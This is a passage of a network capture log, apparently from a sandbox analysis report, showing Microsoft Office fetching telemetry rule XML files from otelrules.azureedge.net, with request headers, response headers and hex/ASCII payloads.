2024-11-07 06:33:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:12 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 52079ed0-501e-0047-273b-2ece6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063312Z-15869dbbcc6khw88hC1DFWbb20000000016000000000nyyc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:12 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:12 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:12 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:12 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 72e3f643-801e-007b-5dd2-2ce7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063312Z-16547b76f7fvllnfhC1DFWxkg800000007w0000000002vgn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:12 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:12 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:12 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1b068de9-201e-0085-515f-2e34e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063312Z-17df447cdb54qlp6hC1DFWqcfc00000003u000000000hzd1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:12 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:13 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:13 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:13 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063313Z-16547b76f7fdf69shC1DFWcpd000000007n000000000d06c x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:13 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:13 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:13 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: ed27c552-101e-007a-705f-2e047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063313Z-15869dbbcc6tjwwhhC1DFWn228000000015g0000000005ea x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:13 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:13 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:13 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:13 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 51919511-a01e-0084-75de-2f9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063313Z-17df447cdb5km9skhC1DFWy2rc000000041g00000000ee14 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:13 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:13 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:13 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 12eeda2a-401e-00ac-598e-2d0a97000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063313Z-15869dbbcc6pfq2ghC1DFWmp14000000012g000000001p40 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:13 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:13 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:13 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:13 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: fdb02178-a01e-001e-0b60-2e49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063313Z-17df447cdb5zfhrmhC1DFWh33000000003ug00000000f9qm x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:13 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:13 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:14 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:14 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 67318102-f01e-005d-7706-2f13ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063314Z-17df447cdb5bz95mhC1DFWnk7w00000003x000000000027d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:14 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:14 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:14 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:14 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063314Z-16547b76f7fj897nhC1DFWdwq400000007g000000000n75t x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:14 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:14 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:14 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:14 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 87c6e767-f01e-003c-4308-2c8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063314Z-16547b76f7fr28cchC1DFWnuws00000007y0000000003nqb x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:14 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:14 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:14 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:14 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: a089fa81-d01e-0066-1640-2eea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063314Z-15869dbbcc6sg5zbhC1DFWzt6c00000001a000000000690h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:14 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:14 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
